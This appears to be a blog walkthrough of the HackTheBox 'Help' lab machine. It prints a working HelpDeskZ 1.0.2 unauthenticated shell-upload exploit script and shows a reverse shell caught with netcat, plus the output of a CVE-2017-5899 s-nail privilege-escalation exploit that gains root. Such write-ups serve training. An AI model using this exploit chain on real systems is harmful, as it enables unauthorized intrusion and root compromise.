Press "Enter" to skip to content

[HackTheBox] Help

I started off with a quick Nmap scan on the instance.

nmap -sSV -T4 10.10.10.121
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-22 11:20 AEST
Nmap scan report for 10.10.10.121
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3000/tcp open  http    Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.83 seconds

Upon navigating to the HTTP service on port 80, it redirected me to the default landing page.

Service running on port 80

Port 3000 was slightly more interesting however it did not look like the initial entry point.

Service running on port 3000

I began my enumeration by performing a quick directory enumeration on the service running at port 80.

root@kali:~/Desktop/HackTheBox/Help# gobuster -w /usr/share/wordlists/dirb/common.txt -u 10.10.10.121

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.121/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/05/22 11:43:36 Starting gobuster
=====================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)
/support (Status: 301)
=====================================================
2019/05/22 11:45:38 Finished
=====================================================

Gobuster was able to discover “support” which redirected me to the HelpDeskZ application.

HelpDeskZ Landing Page

A quick google search on this application revealed this vulnerability which allows Arbitrary Shell Upload that can then be chained with a reverse shell. The exploit from the link is missing a few characters. The working code is the following:

#!/usr/bin/python2

import hashlib
import time
import sys
import requests
import datetime

print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'

if len(sys.argv) < 3:
    print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
    sys.exit(1)

helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]

r = requests.get(helpdeskzBaseUrl)

currentTime = int((datetime.datetime.strptime(r.headers['date'], '%a, %d %b %Y %H:%M:%S %Z') - datetime.datetime(1970,1,1)).total_seconds())

for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext).hexdigest()

    url = helpdeskzBaseUrl+md5hash+'.php'
    response = requests.head(url)
    if response.status_code == 200:
        print "found!"
        print url
        sys.exit(0)
    else:
        print url + ":404"

print "Sorry, I did not find anything"

Following the instructions, I navigated to the following link to upload my shell.

http://10.10.10.121/support/?v=submit_ticket&action=displayForm

I entered random data into the form and selected my shell (named baegmon.php) for the attachment upload. Upon submitting my form, I was shown an error that the file I uploaded is not allowed; however, this is actually not true and the warning can be ignored.

Before executing the exploit, there is one “gotcha”. The exploit requires you to specify the directory in which tickets are uploaded to. By digging through line 138 in submit_ticket_controller.php and line 18 in global.php we can piece together the ticket upload directory.

Line 138: $uploaddir = UPLOAD_DIR.'tickets/';
Line 018: define('UPLOAD_DIR', ROOTPATH . 'uploads/');

http://host/support/uploads/tickets/

With the file uploaded, I ran the exploit and waited until it was able to successfully create my shell.

== Screen 1 ==
root@kali:~/Desktop/HackTheBox/Help# python exploit.py http://10.10.10.121/support/uploads/tickets/ baegmon.php 
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
http://10.10.10.121/support/uploads/tickets/9031654835ec4a4f8350f29e90bc7223.php:404
http://10.10.10.121/support/uploads/tickets/46134c86a55e2ac1004127f1130ddcc7.php:404
http://10.10.10.121/support/uploads/tickets/63f9b3861085c30d310832a3bd86b4ad.php:404
http://10.10.10.121/support/uploads/tickets/9ed2211aa1cfcff9863d04a674a6ad90.php:404
http://10.10.10.121/support/uploads/tickets/fc556c71175dcdd2d934270edf0b4bee.php:404
http://10.10.10.121/support/uploads/tickets/fb194e523fd087dc42cbde5c8168fa46.php:404
...
== Screen 2 ==
root@kali:~/Desktop/HackTheBox/Help# nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.15.176] from (UNKNOWN) [10.10.10.121] 37994
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 09:16:49 up 14 min,  0 users,  load average: 0.00, 0.01, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ 

With shell access on the system, I quickly used Python to upgrade my current shell into a basic bash shell and obtained the user flag.

$ python -c 'import pty; pty.spawn("/bin/bash")'
help@help:/$
help@help:/home$ cd /home/help && cat user.txt
cd /home/help && cat user.txt
bb8**************************6af

I started off with some quick enumeration on the system. I started by looking for SUID/GUID binaries on the system and was able to discover an interesting binary.

help@help:/home/help$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
...
/usr/lib/s-nail/s-nail-privsep
...

I was also running enumeration scripts. Linux Exploit Suggester was able to find the following:

help@help:/tmp$ ./les.sh 

Available information:

Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04.5
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

71 kernel space exploits
39 user space exploits

Possible Exploits:

...

[+] [CVE-2017-5899] s-nail-privget

   Details: https://www.openwall.com/lists/oss-security/2017/01/27/7
   Tags: [ ubuntu=16.04 ],manjaro=16.10
   Rank: 3
   Download URL: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
   ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
   Comments: Distros use own versioning scheme. Manual verification needed.

...

The exploit makes use of a directory traversal vulnerability in the setuid root helper binary in S-nail to gain root privileges. Armed with this knowledge, I obtained the exploit and uploaded it to the system and triggered it.

help@help:/tmp$ ./exploit.sh 
[~] Found privsep: /usr/lib/s-nail/s-nail-privsep
[.] Compiling /var/tmp/.snail.so.c ...
[.] Compiling /var/tmp/.sh.c ...
[.] Compiling /var/tmp/.privget.c ...
[.] Adding /var/tmp/.snail.so to /etc/ld.so.preload ...
[=] s-nail-privsep local root by @wapiflapi
[.] Started flood in /etc/ld.so.preload
[.] Started race with /usr/lib/s-nail/s-nail-privsep
[.] This could take a while...
[.] Race #1 of 1000 ...
This is a helper program of "s-nail" (in /usr/bin).
  It is capable of gaining more privileges than "s-nail"
  and will be used to create lock files.
  It's sole purpose is outsourcing of high privileges into
  fewest lines of code in order to reduce attack surface.
  It cannot be run by itself.

-- snip --

[.] Race #306 of 1000 ...
This is a helper program of "s-nail" (in /usr/bin).
  It is capable of gaining more privileges than "s-nail"
  and will be used to create lock files.
  It's sole purpose is outsourcing of high privileges into
  fewest lines of code in order to reduce attack surface.
  It cannot be run by itself.
[.] Race #307 of 1000 ...
[+] got root! /var/tmp/.sh (uid=0 gid=0)
[.] Cleaning up...
[+] Success:
-rwsr-xr-x 1 root root 6336 May 21 20:45 /var/tmp/.sh
[.] Launching root shell: /var/tmp/.sh
# whoami
root

With root privileges obtained, the only thing left was to obtain the flag!

# cat /root/root.txt
b7f***************************b98
# 

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *